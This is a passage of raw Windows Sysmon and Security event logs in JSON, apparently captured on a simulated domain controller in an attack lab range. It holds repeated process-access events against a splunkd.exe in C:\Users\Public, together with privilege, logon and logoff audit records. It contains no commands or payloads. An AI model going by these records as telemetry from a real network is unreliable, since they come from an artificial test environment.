07:00:25.604","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:26.604\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:26.604","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:27","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:27.604\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:27.604","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:28","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:28.604\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:28.604","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220700,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xABC08\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0xabc08","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 07:00:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220701,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0xABC08\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t52742\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0xabc08","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"52742","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:00:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220702,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0xABC08\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0xabc08","LogonType":"3","EventReceivedTime":"2020-08-01 07:00:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:29.604\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:29.604","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:30.463\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:30.463","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
